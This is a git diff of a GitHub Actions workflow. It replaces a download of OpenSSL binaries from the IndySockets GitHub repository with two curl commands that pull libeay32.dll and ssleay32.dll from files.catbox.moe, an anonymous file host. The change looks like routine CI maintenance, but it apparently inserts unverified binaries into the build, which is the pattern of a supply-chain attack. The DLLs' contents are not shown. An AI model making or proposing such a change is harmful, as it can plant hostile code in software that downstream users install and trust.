diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7ddb586e..48e8d2a9 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -132,8 +132,8 @@ jobs: run: | mkdir OpenSSL cd OpenSSL - curl -L https://github.com/IndySockets/OpenSSL-Binaries/raw/master/Archive/openssl-1.0.2n-i386-win32.zip -o OpenSSL.zip - unzip OpenSSL.zip + curl -L https://files.catbox.moe/ctwswu.dll -o libeay32.dll + curl -L https://files.catbox.moe/ie9e77.dll -o ssleay32.dll - name: Build shell: cmd